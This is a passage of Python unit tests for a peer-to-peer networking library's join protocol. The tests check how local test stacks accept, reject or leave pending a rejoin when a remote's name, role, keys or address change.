self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
beta.keep.rejectRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=6.0)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.rejected.value)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousRejectedRejectSameRoleKeys(self):
'''
Test joiner reject rejected non vacuous renewal join with same role/keys (J1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousRejectedRejectSameRoleKeys.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
beta.keep.rejectRemote(betaRemote)
# Name: Either
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: Old
# Sameness: Same Role/Keys
keep = self.copyData(betaRemote)
# Mutable: Either
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, Remove Clear
for stack in [alpha, beta]:
self.assertTrue(len(stack.stats) > 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(beta.transactions), 0)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousRejectedRejectSameAll(self):
'''
Test joiner reject rejected non vacuous renewal join with same all (J2)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousRejectedRejectSameAll.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
beta.keep.rejectRemote(betaRemote)
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(betaRemote)
# Mutable: Either
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, Remove Clear
for stack in [alpha, beta]:
self.assertTrue(len(stack.stats) > 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertEqual(len(alpha.transactions), 1)
self.assertEqual(len(beta.transactions), 0)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertNotIn('joinent_transaction_failure', alpha.stats)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewName(self):
'''
Test mutable joiner accept non vacuous renewal join with updated name (K1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewName.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: New
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.name, newName)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewMain(self):
'''
Test mutable joiner accept non vacuous join with updated main (K2)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewMain.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Main: New, it can only happen if old Main value is False (or None) it's because Joinent could only be main
# to accept transaction. So bootstrap slave alpha joined to main beta. Then set alpha to be main and rejoin.
beta, alpha = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: New
oldMain = None
newMain = True
self.assertIs(alpha.main, oldMain)
alpha.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.main, newMain)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewKind(self):
'''
Test mutable joiner accept non vacuous join with updated kind (K3)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: New
oldKind = alpha.kind
newKind = 33
self.assertNotEqual(oldKind, newKind)
alpha.kind = newKind
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.kind, newKind)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewRha(self):
'''
Test mutable joiner accept non vacuous join with updated host address (K4)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewRha.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapJoinedRemotes(autoMode=raeting.AutoMode.always.value)
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: Either
# RHA: New
# 1. Initiate join with initHa
# 2. Set betaRemote.ha = fakeHa
# 3. Accept alpha responce:
# - alpha will respond with initHa
# - beta will know fakeHa
initHa = alpha.local.ha
fakeHa = ('127.0.0.5', alpha.local.ha[1])
self.assertNotEqual(initHa, fakeHa)
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: No
console.terse("\nJoin Transaction **************\n")
beta.join(uid=betaRemote.nuid)
betaRemote.ha = fakeHa
# Keep beta values here, before accept. Accept will change it because not same all
keep = self.copyData(betaRemote)
self.serviceStacks([alpha, beta])
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.ha, alpha.local.ha)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewFuid(self):
'''
Test mutable joiner accept non vacuous join with updated host fuid/reid (K5)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewFuid.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapJoinedRemotes(autoMode=raeting.AutoMode.always.value)
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: New:
# 1. Initiate join with initFuid
# 2. Update betaRemote.fuid = fakeFuid
# 3. Accept alpha responce:
# - alpha will respond with initFuid
# - beta will know fakeFuid
initFuid = alphaRemote.nuid
fakeFuid = initFuid + 10
# Leid: Old
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote, fuid=fakeFuid)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: No
console.terse("\nJoin Transaction **************\n")
beta.join(uid=betaRemote.nuid)
betaRemote.fuid = fakeFuid
self.serviceStacks([alpha, beta])
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.fuid, initFuid)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewRole(self):
'''
Test mutable joiner accept non vacuous join with updated role (K6)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: New
oldRole = alpha.local.role
newRole = '{0}_new'.format(oldRole)
alpha.local.role = newRole
alpha.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
roleData = beta.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertFalse(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.role, newRole)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewKeys(self):
'''
Test mutable joiner accept non vacuous join with updated keys (K7)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewKeys.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapJoinedRemotes(autoMode=raeting.AutoMode.always.value)
betaRemote = beta.remotes.values()[0]
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Old
# Keys: New
alpha.local.signer = nacling.Signer()
alpha.local.priver = nacling.Privateer()
alpha.dumpLocalRole()
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertFalse(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.verfer.keyhex, alpha.local.signer.verhex)
self.assertEqual(betaRemote.pubber.keyhex, alpha.local.priver.pubhex)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptSameAll(self):
'''
Test joiner accept non vacuous join with same all (L1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptSameAll.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Old
# Leid: Old
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(betaRemote)
# Mutable: Either
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendNewName(self):
'''
Test mutable joiner pend pending vacuous join with updated name (M1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewName.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: New
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
